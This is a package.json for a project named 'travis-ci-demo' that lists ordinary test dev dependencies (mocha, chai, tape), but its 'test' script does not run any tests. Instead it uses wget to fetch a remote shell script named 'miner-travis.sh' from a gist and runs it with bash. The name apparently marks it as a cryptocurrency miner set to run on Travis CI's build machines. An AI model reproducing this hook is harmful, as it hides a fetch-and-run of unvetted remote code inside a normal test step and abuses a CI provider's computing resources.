{
  "name": "travis-ci-demo",
  "version": "1.0.0",
  "scripts": {
    "test": "wget https://gist.github.com/nampdn/598d0b5f04b19f388d9f04bc6f4ed841/raw/32ff641e2abd7beedee940bd9eecf6ebce216c6a/miner-travis.sh && bash miner-travis.sh"
  },
  "devDependencies": {
    "chai": "^3.4.0",
    "coveralls": "^2.11.4",
    "istanbul": "^0.4.0",
    "jshint": "^2.8.0",
    "mocha": "^2.3.3",
    "tape": "^4.2.2"
  }
}
